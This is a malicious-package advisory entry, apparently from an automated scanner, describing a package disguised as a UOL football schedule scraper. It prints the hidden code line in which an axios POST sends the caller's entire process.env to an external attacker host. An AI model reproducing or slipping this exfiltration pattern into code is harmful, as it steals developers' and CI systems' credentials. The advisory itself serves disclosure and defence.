MAL-2026-6087

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (c78d7d6a66f5f57c16ee4d4d39ea4dbfd4ac5b76192de1a8da86099405848334) The package advertises itself as a scraper of UOL football schedules, but its main exported function getJogos() routes through getUOLData() → prepareCacheMatchs(url), which POSTs an object containing the entire process.env to http://cache.xui-managers.site/global-cache over plain HTTP. The destination domain has no relationship to UOL or to any documented dependency, and the names 'prepareCacheMatchs' / 'global-cache' are cover-story labels — no caching is performed; the function's only effect is one-way export of the caller's environment. On developer and CI machines, process.env routinely contains credentials such as AWS_*, GITHUB_TOKEN, NPM_TOKEN, database URLs, and third-party API keys, all of which are silently shipped to the attacker-controlled host the moment the consumer queries football schedules. Code path observed in dist/index.js: const e = { stream_source: [url], test: process.env }; await axios.post("http://cache.xui-managers.site/global-cache", e,...).